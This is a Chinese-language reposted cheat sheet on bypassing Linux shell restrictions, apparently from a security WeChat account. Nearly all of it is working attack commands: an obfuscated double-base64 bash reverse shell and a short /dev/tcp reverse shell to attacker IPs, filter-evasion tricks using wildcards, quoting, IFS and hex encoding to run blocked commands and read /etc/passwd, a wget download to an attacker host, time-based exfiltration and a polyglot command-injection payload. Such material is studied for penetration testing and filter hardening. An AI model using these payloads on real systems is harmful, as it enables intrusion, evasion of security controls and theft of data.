绕过 Linux Shell 限制
2022-10-8 08:9:18 Author: 系统安全运维(查看原文) 阅读量:16 收藏

常见现实绕过
Reverse Shell
# Double-Base64 是避免像+之类符号的方法。90%的情况下是有效的echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'#echo\WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
Short Rev shell
#Trick from Dikline#获取一个rev shell(sh)0>/dev/tcp/10.10.10.10/443#得到输出的rev shellexec >&0
Bypass Paths and forbidden words
# Question mark binary substitution/usr/bin/p?ng # /usr/bin/pingnma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory argumentstouch -- -la # -- stops processing options after the --ls *
# [chars]/usr/bin/n[c] # /usr/bin/nc
# Quotes / Concatenation'p'i'n'g # ping"w"h"o"a"m"i # whoami\u\n\a\m\e \-\a # uname -aech''o test # echo testech""o test # echo testbas''e64 # base64/\b\i\n/////s\h
# Execution through $0echo whoami|$0
# Uninitialized variables: A uninitialized variable equals to null (nothing)cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbolp${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# Fake commandsp$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shownw`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
# Concatenation of strings using history!-1 # This will be substitute by the last command executed, and !-2 by the penultimate commandmi # This will throw an errorwhoa # This will throw an error!-1!-2 # This will execute whoami
Bypass forbidden spaces
# {form}{cat,lol.txt} # cat lol.txt{echo,test} # echo test
# IFS - Internal field separator, change " " for any other character ("]" in this case)cat${IFS}/etc/passwd # cat /etc/passwdcat$IFS/etc/passwd # cat /etc/passwd
# Put the command line in a variable and then execute itIFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$bIFS=];b=cat]/etc/passwd;$b # Using 2 ";"IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice# Other way, just change each space for ${IFS}echo${IFS}test
# Using hex formatX=$'cat\x20/etc/passwd'&&$X
# New linesp\i\n\g # These 4 lines will equal to ping
# Undefined variables and !$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefineduname!-1\-a # This equals to uname -a
Bypass backslash and slash
cat ${HOME:0:1}etc${HOME:0:1}passwdcat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
Bypass with hex encoding
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`cat `xxd -r -p <<< 2f6574632f706173737764`xxd -r -ps <(echo 2f6574632f706173737764)cat `xxd -r -ps <(echo 2f6574632f706173737764)`
Bypass IPs
# Decimal IPs127.0.0.1 == 2130706433
Time based data exfiltration
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
DNS data exfiltration
可以使用burpcollab 或者 pingb#http://pingb.in/
Polyglot command injection
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
只读/不允许执行绕过
如果你在一个只具有只读和无执行权限的文件系统中,仍然有办法执行任意的二进制文件。其中一个就是DDexec。
详细的利用与实现原理请访问
https://github.com/arget13/DDexec

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247510840&idx=2&sn=9a1d8117b0f5ef99ed16bc2850ba422d&chksm=c3087848f47ff15e411355b998e1b5378d674543372696ddfefc1cabb7cbd5f61dee2961bf30#rd
如有侵权请联系:admin#unsafe.sh